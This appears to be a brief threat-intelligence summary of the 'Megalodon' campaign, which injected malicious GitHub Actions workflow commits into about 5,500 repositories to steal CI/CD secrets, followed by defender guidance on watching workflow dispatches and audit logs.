GitHub Actions abused by Megalodon attack to slip malicious commits into 5,500 repos
Summary
A campaign dubbed Megalodon has been observed abusing GitHub Actions to inject malicious commits into over 5,500 public repositories. These commits modify workflow files to steal secrets exposed during CI/CD execution, such as cloud credentials and SSH keys.
IFF Assessment
FOE
This campaign represents a sophisticated attack on the software supply chain by compromising CI/CD pipelines, which is detrimental to defenders.
Defender Context
This incident highlights a significant threat to the software supply chain, where attackers can infiltrate repositories through CI/CD pipelines like GitHub Actions. Defenders should be vigilant about unexpected workflow dispatches and review audit logs for suspicious token requests to identify and mitigate such attacks.